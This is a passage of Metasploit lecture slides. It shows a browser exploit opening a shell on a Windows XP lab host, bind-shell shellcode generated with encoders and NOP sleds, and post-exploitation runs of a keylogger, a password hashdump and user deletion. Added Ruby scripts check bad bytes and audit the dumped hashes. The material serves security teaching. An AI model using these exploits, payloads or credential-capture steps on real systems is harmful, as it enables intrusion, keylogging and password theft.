[*] Local IP: http://192.168.1.5:8080/
[*] Server started.

4. Wait for incoming hosts

msf6 exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.100:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)

5. Exploit them as they connect

msf6 exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop>

Page 55: Payload module

Page 56: Overview

Types

● Single
  ○ Self-contained
  ○ Standalone
● Stager
  ○ Setup network connection
  ○ Small and reliable
  ○ Can use multiple similar stagers
● Stage
  ○ Payload components
  ○ Downloaded by stagers
  ○ Provide advanced features

msf6 payload(windows/shell_bind_tcp) >
Single payload (no stage)

msf6 payload(windows/shell/bind_tcp) >
Stager (bind_tcp) and stage (shell)

Page 57: Structure

Payload type (modules/payloads)

kali@kali:~# ls /usr/share/metasploit-framework/modules/payloads
singles  stagers  stages

Operating system (modules/payloads/*)

kali@kali:~# ls /usr/share/metasploit-framework/modules/payloads/singles
aix      apple_ios  bsdi  firefox  java   mainframe  osx  python  ruby     tty
android  bsd        cmd   generic  linux  nodejs     php  r       solaris  windows

Payload (modules/payloads/*/*)

kali@kali:~# ls /usr/share/metasploit-framework/modules/payloads/singles/windows
adduser.rb                      meterpreter_bind_tcp.rb          powershell_bind_tcp.rb
dns_txt_query_exec.rb           meterpreter_reverse_http.rb      powershell_reverse_tcp.rb
download_exec.rb                meterpreter_reverse_https.rb     shell_bind_tcp.rb
encrypted_shell_reverse_tcp.rb  meterpreter_reverse_ipv6_tcp.rb  shell_bind_tcp_xpfw.rb
exec.rb                         meterpreter_reverse_tcp.rb       shell_hidden_bind_tcp.rb
format_all_drives.rb            metsvc_bind_tcp.rb               shell_reverse_tcp.rb
loadlibrary.rb                  metsvc_reverse_tcp.rb            speak_pwned.rb
messagebox.rb                   pingback_bind_tcp.rb             x64
meterpreter_bind_named_pipe.rb  pingback_reverse_tcp.rb

Page 58: Commands

msf6 > use payload/windows/shell_bind_tcp
msf6 payload(windows/shell_bind_tcp) > help
...
Payload Commands
================

    Command     Description
    -------     -----------
    check       Check to see if a target is vulnerable
    generate    Generates a payload
    reload      Reload the current module from disk
    to_handler  Creates a handler with the specified payload

Using a payload module adds new payload-specific commands

msf6 payload(windows/shell_bind_tcp) > generate -h
Usage: generate [options]

Generates a payload. Datastore options may be supplied after normal options.

Example: generate -f python LHOST=127.0.0.1

OPTIONS:

    -E          Force encoding
    -O <opt>    Deprecated: alias for the '-o' option
    -P <opt>    Total desired payload size, auto-produce appropriate NOP sled length
    -S <opt>    The new section name to use when generating (large) Windows binaries
    -b <opt>    The list of characters to avoid example: '\x00\xff'
    -e <opt>    The encoder to use
    -f <opt>    Output format: base32,base64,bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,python-reflection,vba,vba-exe,vba-psh,vbs,war
    -h          Show this message
    -i <opt>    The number of times to encode the payload
    -k          Preserve the template behavior and inject the payload as a new thread
    -n <opt>    Prepend a nopsled of [length] size on to the payload
    -o <opt>    The output file name (otherwise stdout)
    -p <opt>    The platform of the payload
    -v          Verbose output (display stage in addition to stager)
    -x <opt>    Specify a custom executable file to use as a template

Page 59: Example (generate payload)

msf6 payload(windows/shell_bind_tcp) > generate
# windows/shell_bind_tcp - 328 bytes
# https://metasploit.com/
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, CreateSession=true
buf =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
...

Generated payload

Page 60: Example (generate payload with disallowed bytes)

msf6 payload(windows/shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# https://metasploit.com/
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, CreateSession=true
buf =
"\xda\xdc\xd9\x74\x24\xf4\xbe\xca\xaa\xca\x1e\x5f\x2b\xc9" +
"\xb1\x53\x31\x77\x17\x83\xc7\x04\x03\xbd\xb9\x28\xeb\xbd" +
"\x56\x2e\x14\x3d\xa7\x4f\x9c\xd8\x96\x4f\xfa\xa9\x89\x7f" +
"\x88\xff\x25\x0b\xdc\xeb\xbe\x79\xc9\x1c\x76\x37\x2f\x13" +
...

Generated payload with disallowed bytes (compare with the plain generate output on page 59: the encoder prepends a decoder stub, which is where the extra bytes come from)
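The check a practitioner runs on the output above, as an added example that is not part of the slides or of Metasploit's own code: parse the Ruby-format buffer that `generate` prints, apply the same `-b '\x00'` exclusion list, and report the offsets of any disallowed byte plus whether the byte count matches the header. Both inputs are constructed: the first 14 bytes of the two slide buffers, with the header rewritten to declare 14 bytes so the size check can be exercised offline.

```ruby
# Added example, not from the slides or Metasploit's own code: verify that a
# `generate` buffer honours a `-b` exclusion list before trusting it.
# Both inputs below are constructed fragments (first 14 bytes of the slide
# buffers, header rewritten to say 14 bytes); they are not complete payloads.

RAW_OUTPUT = <<~'MSF'
  # windows/shell_bind_tcp - 14 bytes
  # https://metasploit.com/
  # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
  # EXITFUNC=process, CreateSession=true
  buf =
  "\xfc\xe8\x82\x00\x00\x00\x60" +
  "\x89\xe5\x31\xc0\x64\x8b\x50"
MSF

ENCODED_OUTPUT = <<~'MSF'
  # windows/shell_bind_tcp - 14 bytes
  # https://metasploit.com/
  # Encoder: x86/shikata_ga_nai
  # VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
  # EXITFUNC=process, CreateSession=true
  buf =
  "\xda\xdc\xd9\x74\x24\xf4\xbe" +
  "\xca\xaa\xca\x1e\x5f\x2b\xc9"
MSF

# Turn "\x00\xff"-style text (the -b syntax, and the buffer literal syntax) into bytes.
def hex_escapes_to_bytes(text)
  text.scan(/\\x([0-9a-fA-F]{2})/).flatten.map { |h| h.to_i(16) }
end

# Pull the encoder name, the declared size and the byte string out of generate output.
def parse_generate_output(text)
  info = { encoder: nil, declared_size: nil, bytes: [] }
  text.each_line do |line|
    if (m = line.match(/\A#\s*\S+ - (\d+) bytes/))
      info[:declared_size] = m[1].to_i            # "# windows/shell_bind_tcp - N bytes"
    elsif (m = line.match(/\A#\s*Encoder:\s*(\S+)/))
      info[:encoder] = m[1]                        # only present when an encoder ran
    elsif !line.start_with?('#')
      # every quoted chunk on a buf line, concatenated in order
      line.scan(/"((?:\\x[0-9a-fA-F]{2})+)"/).flatten.each do |chunk|
        info[:bytes].concat(hex_escapes_to_bytes(chunk))
      end
    end
  end
  info
end

# Offsets of every byte that appears in the exclusion list; empty means clean.
def disallowed_offsets(bytes, badchars)
  bytes.each_index.select { |i| badchars.include?(bytes[i]) }
end

# The check itself: does the buffer honour -b, and does its length match the header?
def check_generate_output(text, badchar_spec)
  parsed  = parse_generate_output(text)
  offsets = disallowed_offsets(parsed[:bytes], hex_escapes_to_bytes(badchar_spec))
  {
    encoder: parsed[:encoder],
    size: parsed[:bytes].size,
    size_matches_header: parsed[:bytes].size == parsed[:declared_size],
    offsets: offsets,
    clean: offsets.empty?
  }
end

if __FILE__ == $PROGRAM_NAME
  puts "raw:     #{check_generate_output(RAW_OUTPUT, '\x00').inspect}"
  puts "encoded: #{check_generate_output(ENCODED_OUTPUT, '\x00').inspect}"
end
```

On the slides the raw buffer is 328 bytes and the shikata_ga_nai output 355: the difference is the decoder stub prepended to the encoded bytes, which this check counts like any other byte.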

Page 61: Metasploit - axiom.utm.utoronto.ca

Example (generate payload with specific encoder)

msf6 payload(windows/shell_bind_tcp) > generate -e x86/nonalpha
# windows/shell_bind_tcp - 470 bytes
# https://metasploit.com/
# Encoder: x86/nonalpha
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, CreateSession=true
buf =
"\x66\xb9\xff\xff\xeb\x19\x5e\x8b\xfe\x83\xc7\x6a\x8b\xd7" +
"\x3b\xf2\x7d\x0b\xb0\x7b\xf2\xae\xff\xcf\xac\x28\x07\xeb" +
"\xf1\xeb\x6f\xe8\xe2\xff\xff\xff\x17\x2b\x29\x29\x09\x31" +
"\x1a\x29\x24\x29\x31\x2f\x03\x33\x2a\x22\x32\x32\x06\x06" +
"\x23\x23\x15\x30\x23\x37\x1a\x22\x21\x2a\x21\x13\x13\x04" +
...

Generated payload with specific encoder (compare the unencoded 328-byte payload on page 59; x86/nonalpha produces 470 bytes)

msf6 payload(windows/shell_bind_tcp) > show encoders

Encoders
========

   #   Name                Disclosure Date  Rank       Check  Description
   -   ----                ---------------  ----       -----  -----------
   ...
   36  x86/nonalpha                         low        No     Non-Alpha Encoder
   37  x86/nonupper                         low        No     Non-Upper Encoder
   38  x86/opt_sub                          manual     No     Sub Encoder (optimised)
   39  x86/service                          manual     No     Register Service
   40  x86/shikata_ga_nai                   excellent  No     Polymorphic XOR Additive Feedback Encoder

Encoders for specific payload

Page 62: Metasploit - axiom.utm.utoronto.ca

Example (generate payload with multiple passes)

msf6 payload(windows/shell_bind_tcp) > generate -b '\x00'
# windows/shell_bind_tcp - 355 bytes
# https://metasploit.com/
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, CreateSession=true
buf =
"\xd9\xce\xd9\x74\x24\xf4\xb8\xf4\xee\x6b\x7f\x5a\x2b\xc9" +
"\xb1\x53\x83\xea\xfc\x31\x42\x13\x03\xb6\xfd\x89\x8a\xca" +
"\xea\xcc\x75\x32\xeb\xb0\xfc\xd7\xda\xf0\x9b\x9c\x4d\xc1" +
"\xe8\xf0\x61\xaa\xbd\xe0\xf2\xde\x69\x07\xb2\x55\x4c\x26" +
...

Generated payload

msf6 payload(windows/shell_bind_tcp) > generate -b '\x00' -i 2
# windows/shell_bind_tcp - 382 bytes
# https://metasploit.com/
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, CreateSession=true
buf =
"\xdb\xd7\xb8\x62\xa2\x5d\x22\xd9\x74\x24\xf4\x5d\x29\xc9" +
"\xb1\x59\x31\x45\x1a\x83\xc5\x04\x03\x45\x16\xe2\x97\x7b" +
"\xb6\x9a\xd6\x05\x5e\xbc\x01\x81\x44\xb6\xec\x5b\x4c\x87" +
"\x5d\xad\x0b\xff\xe2\x08\x97\xfc\x20\xf8\x6d\x90\x92\x99" +
...

Generated payload with 2 passes

msf6 payload(windows/shell_bind_tcp) > generate -b '\x00' -i 5
# windows/shell_bind_tcp - 463 bytes
# https://metasploit.com/
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, CreateSession=true
buf =
"\xda\xd3\xba\x65\x90\x59\xf3\xd9\x74\x24\xf4\x58\x31\xc9" +
"\xb1\x6e\x31\x50\x17\x03\x50\x17\x83\x8d\x6c\xbb\x06\x97" +
"\x45\x83\x62\xb8\xf1\x9f\xad\xb2\xd9\xab\x10\x11\xeb\xe5" +
"\xca\xe6\x05\xf9\x24\x96\xcd\x01\x39\xf9\x93\x57\x1c\xe9" +
...

Generated payload with 5 passes

Page 63: Metasploit - axiom.utm.utoronto.ca

Example (generate payload with different coding format)

Generated payload (default Ruby format, identical to the 328-byte listing on page 59)

msf6 payload(windows/shell_bind_tcp) > generate -f c
/*
 * windows/shell_bind_tcp - 328 bytes
 * https://metasploit.com/
 * VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
 * EXITFUNC=process, CreateSession=true
 */
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
...

Generated payload in C

msf6 payload(windows/shell_bind_tcp) > generate -f java
/*
 * windows/shell_bind_tcp - 328 bytes
 * https://metasploit.com/
 * VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
 * EXITFUNC=process, CreateSession=true
 */
byte buf[] = new byte[]{
    (byte) 0xfc, (byte) 0xe8, (byte) 0x82, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x60, (byte) 0x89,
    (byte) 0xe5, (byte) 0x31, (byte) 0xc0, (byte) 0x64, (byte) 0x8b, (byte) 0x50, (byte) 0x30, (byte) 0x8b,
    (byte) 0x52, (byte) 0x0c, (byte) 0x8b, (byte) 0x52, (byte) 0x14, (byte) 0x8b, (byte) 0x72, (byte) 0x28,
    (byte) 0x0f, (byte) 0xb7, (byte) 0x4a, (byte) 0x26, (byte) 0x31, (byte) 0xff, (byte) 0xac, (byte) 0x3c,
...

Generated payload in Java

Page 64: Metasploit - axiom.utm.utoronto.ca

Example (generate payload with NOP sled)

msf6 payload(windows/shell_bind_tcp) > generate -n 14
# windows/shell_bind_tcp - 342 bytes
# https://metasploit.com/
# NOP gen: x86/single_byte
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
# EXITFUNC=process, CreateSession=true
buf =
"\x93\x97\xf9\x9b\x47\x55\x5f\x5b\x5f\x95\x43\x49\x2f\x51" +
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
...

Generated payload with NOP sled (the 14 single-byte NOPs on the first line are prepended to the unchanged 328-byte payload from page 59, giving 342 bytes)
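The following Ruby script is an added example, not code from the slides or from the Metasploit project. It shows from the tool's side what pages 60 to 64 demonstrate at the console: it turns a \xNN listing back into raw bytes (useful when you want to hash or scan what was generated), reports any disallowed bytes (the property that generate -b guarantees after encoding), and renders the bytes in the Ruby, C and Java shapes that generate -f prints. The 16-byte sample is constructed from the first bytes of the page 59 listing; all function names are assumptions of this example.

```ruby
# Added example (not from the slides or Metasploit): bad-byte verification and
# the three output formats shown on pages 60 to 64, reimplemented in plain Ruby.

# Constructed sample: the first 16 bytes of the unencoded windows/shell_bind_tcp
# listing on page 59, including the three \x00 bytes that "-b '\x00'" removes.
SAMPLE_LISTING = 'buf = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" + "\x30\x8b"'

# Turn a "\xNN"-escaped listing (the Ruby or C output of generate) back into raw
# bytes. The same parser reads a '-b' spec such as '\x00\xff'.
def unescape_hex(text)
  text.scan(/\\x(\h{2})/).flatten.map { |h| h.to_i(16) }.pack('C*')
end

# Return [offset, byte] pairs for every disallowed byte found in buf.
# An empty result is what an encoder run with -b must deliver.
def find_badchars(buf, badchars)
  bad = badchars.bytes
  buf.each_byte.with_index.select { |b, _i| bad.include?(b) }.map { |b, i| [i, b] }
end

# One quoted run of \xNN escapes, as both the Ruby and C formats use.
def hex_escape(bytes)
  '"' + bytes.map { |b| format('\x%02x', b) }.join + '"'
end

# Default (Ruby) format: 14 bytes per line, lines joined with " +".
def format_ruby(buf)
  "buf = \n" + buf.bytes.each_slice(14).map { |c| hex_escape(c) }.join(" +\n")
end

# -f c: 15 bytes per line as adjacent C string literals, terminated with ";".
def format_c(buf)
  "unsigned char buf[] = \n" + buf.bytes.each_slice(15).map { |c| hex_escape(c) }.join("\n") + ';'
end

# -f java: a byte[] initializer with every element cast to (byte), 8 per line.
def format_java(buf)
  items = buf.bytes.map { |b| format('(byte) 0x%02x', b) }
  "byte buf[] = new byte[]{\n" + items.each_slice(8).map { |r| '  ' + r.join(', ') }.join(",\n") + "\n};"
end

if __FILE__ == $PROGRAM_NAME
  buf = unescape_hex(SAMPLE_LISTING)
  hits = find_badchars(buf, unescape_hex('\x00'))
  puts "#{buf.bytesize} bytes; disallowed bytes at (offset, value): #{hits.inspect}"
  puts format_c(buf)
end
```

Running the script on the sample reports the three \x00 bytes at offsets 3, 4 and 5, which is exactly why the page 60 run had to encode the payload; running find_badchars over the 355-byte shikata_ga_nai output instead would return an empty list.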

Page 66: Metasploit - axiom.utm.utoronto.ca

Post module


Page 67: Metasploit - axiom.utm.utoronto.ca

Overview

Types

● Capture
● Gather
● Manage

kali@kali:~# ls /usr/share/metasploit-framework/modules/post/windows/capture
keylog_recorder.rb  lockout_keylogger.rb

Capture post modules

kali@kali:~# ls /usr/share/metasploit-framework/modules/post/windows/gather
ad_to_sqlite.rb       enum_ad_to_wordlist.rb    enum_emet.rb             enum_snmp.rb               outlook.rb
arp_scanner.rb        enum_ad_user_comments.rb  enum_files.rb            enum_termserv.rb           phish_windows_credentials.rb
avast_memory_dump.rb  enum_ad_users.rb          enum_hostfile.rb         enum_tokens.rb             psreadline_history.rb
bitcoin_jacker.rb     enum_applications.rb      enum_hyperv_vms.rb       enum_tomcat.rb             resolve_sid.rb
bitlocker_fvek.rb     enum_artifacts.rb         enum_ie.rb               enum_trusted_locations.rb  reverse_lookup.rb
bloodhound.rb         enum_av_excluded.rb       enum_logged_on_users.rb  enum_unattend.rb           screen_spy.rb
cachedump.rb          enum_chrome.rb            enum_ms_product_keys.rb  file_from_raw_ntfs.rb      smart_hashdump.rb
checkvm.rb            enum_computers.rb         enum_muicache.rb         forensics                  tcpnetstat.rb
credentials           enum_db.rb                enum_onedrive.rb         ...

Gather post modules

kali@kali:~# ls /usr/share/metasploit-framework/modules/post/windows/manage
add_user.rb              forward_pageant.rb  nbd_server.rb       rid_hijack.rb                    vss_list.rb
archmigrate.rb           hashcarve.rb        peinjector.rb       rollback_defender_signatures.rb  vss_mount.rb
change_password.rb       ie_proxypac.rb      persistence_exe.rb  rpcapd_start.rb                  vss.rb
clone_proxy_settings.rb  inject_ca.rb        portproxy.rb        run_as_psh.rb                    vss_set_storage.rb
delete_user.rb           inject_host.rb      powershell          run_as.rb                        vss_storage.rb
...

Manage post modules

Page 68: Metasploit - axiom.utm.utoronto.ca

Structure

kali@kali:~# ls /usr/share/metasploit-framework/modules/post
aix  android  apple_ios  bsd  firefox  hardware  linux  multi  networking  osx  solaris  windows

Operating system (modules/post)

kali@kali:~# ls /usr/share/metasploit-framework/modules/post/windows
capture  escalate  gather  manage  recon  wlan

Post type (modules/post/*)

kali@kali:~# ls /usr/share/metasploit-framework/modules/post/windows/capture
keylog_recorder.rb  lockout_keylogger.rb

Tool (modules/post/*/*)

Page 69: Metasploit - axiom.utm.utoronto.ca

Commands

msf6 > use multi/gather/apple_ios_backup
msf6 post(multi/gather/apple_ios_backup) > help

...
Post Commands
=============

    Command   Description
    -------   -----------
    check     Check to see if a target is vulnerable
    exploit   This is an alias for the run command
    reload    Reload the current module from disk
    rerun     Reloads and launches the module
    rexploit  This is an alias for the rerun command
    run       Launches the post exploitation module

Using a post module adds new post-specific commands

Page 70: Metasploit - axiom.utm.utoronto.ca

Example (capture post)

1. Pick the module

msf6 > use post/windows/capture/keylog_recorder

2. Switch to interactive session

msf6 post(keylog_recorder) > sessions -i 1
[*] Starting interaction with 1...

3. Run the module

meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
[*] Recording keystrokes...
^C
[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...

4. Inspect generated file

kali@kali:~# cat /root/.msf4/loot/20110421120355_default_192.168.1.195_host.windows.key_328113.txt
Keystroke log started at Thu Apr 21 12:03:55 -0600 2011
root s3cr3t
ftp ftp.microsoft.com anonymous [email protected] e quit

Page 71: Metasploit - axiom.utm.utoronto.ca

Example (gather post)

1. Pick the module

msf6 > use post/windows/gather/hashdump

2. Switch to interactive session

msf6 post(hashdump) > sessions -i 1
[*] Starting interaction with 1...

3. Run the module

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::

Page 72: Metasploit - axiom.utm.utoronto.ca

Example (manage post)

1. Pick the module

msf6 > use post/windows/manage/delete_user

2. Switch to interactive session

msf6 post(hashdump) > sessions -i 1
[*] Starting interaction with 1...

3. Run the module

meterpreter > run post/windows/manage/delete_user USERNAME=hacker

[*] User was deleted!

4. Verify

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:7bf4f254b228bb24aad1b435b51404ee:2892d26cdf84d7a70e2fb3b9f05c425e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::
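The hashdump listing on page 71 and the "Verify" step on page 72 both read the same pwdump-style lines by eye. The Ruby script below is an added example, not code from the slides or from Metasploit: it parses those lines, flags what a defender should act on in them (LM hashes still being stored, a password that is at most 7 characters, an empty password), and answers the page 72 question of whether a given account is still present. The hash values are the ones printed on page 71; the function names and finding labels are assumptions of this example.

```ruby
# Added example (not from the slides or Metasploit): audit a hashdump listing.

# Sample input taken from the page 71 listing, with one status line kept to
# show that non-hash lines are ignored.
HASHDUMP_OUTPUT = <<~PWDUMP
  [*] Dumping password hashes...
  Administrator:500:7bf4f254b222ab21aad3b435b51404ee:2792d23cdf84d1a70e2eb3b9f05c425e:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:2e61920ebe3ed6e6d108113bf6318ee2:5abb944dc0761399b730f300dd474714:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:92e5d2c675bed8d4dc6b74ddd9b4c287:::
PWDUMP

# Well-known constants: the LM and NT hashes of an empty password. hashdump
# also prints the empty LM hash when LM storage is disabled on the host.
EMPTY_LM = 'aad3b435b51404ee' * 2
EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'

Account = Struct.new(:user, :rid, :lm, :nt)

# Accept only lines shaped user:rid:lm:nt:::; anything else is skipped.
def parse_pwdump(text)
  text.each_line.filter_map do |line|
    f = line.strip.split(':')
    next unless f.size >= 4 && f[1].match?(/\A\d+\z/) &&
                f[2].match?(/\A\h{32}\z/) && f[3].match?(/\A\h{32}\z/)
    Account.new(f[0], f[1].to_i, f[2].downcase, f[3].downcase)
  end
end

# Findings per account name:
#   :lm_hash_present          LM hashes are stored; disable LM storage on the host
#   :password_at_most_7_chars the second LM half is the empty half, so the
#                             password is 7 characters or shorter (LM pads to 14
#                             and hashes each 7-byte half separately)
#   :empty_password           NT hash of "", the account has no password at all
def audit_hashes(accounts)
  accounts.to_h do |a|
    findings = []
    if a.lm != EMPTY_LM
      findings << :lm_hash_present
      findings << :password_at_most_7_chars if a.lm[16, 16] == EMPTY_LM[16, 16]
    end
    findings << :empty_password if a.nt == EMPTY_NT
    [a.user, findings]
  end
end

# The page 72 check: is the named account (case-insensitive, as on Windows) still listed?
def user_present?(accounts, name)
  accounts.any? { |a| a.user.casecmp?(name) }
end

if __FILE__ == $PROGRAM_NAME
  accounts = parse_pwdump(HASHDUMP_OUTPUT)
  audit_hashes(accounts).each { |user, findings| puts "#{user}: #{findings.inspect}" }
  puts "hacker present: #{user_present?(accounts, 'hacker')}"
end
```

On the page 71 data this reports Administrator with an LM hash and a password of at most 7 characters, Guest with an empty password, HelpAssistant with an LM hash, and nothing for SUPPORT_388945a0; the account named hacker is absent, which is the result the page 72 verification step is looking for.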

Page 74: Metasploit - axiom.utm.utoronto.ca

Conclusion


Page 76: Metasploit - axiom.utm.utoronto.ca

Sources


https://en.wikipedia.org/wiki/Metasploit_Project

https://blog.eccouncil.org/what-is-metasploit-and-how-is-it-used-in-penetration-testing/

https://hydrasky.com/network-security/metasploit-tutorial-part1/

https://www.offensive-security.com/metasploit-unleashed/

https://tools.kali.org/exploitation-tools/metasploit-framework

https://www.kali.org/docs/tools/starting-metasploit-framework-in-kali/

https://blog.rapid7.com

https://docs.rapid7.com/metasploit/quick-start-guide

https://github.com/rapid7/metasploit-framework

https://enlyft.com/tech/products/metasploit

https://linuxhint.com/metasploit_usage_examples/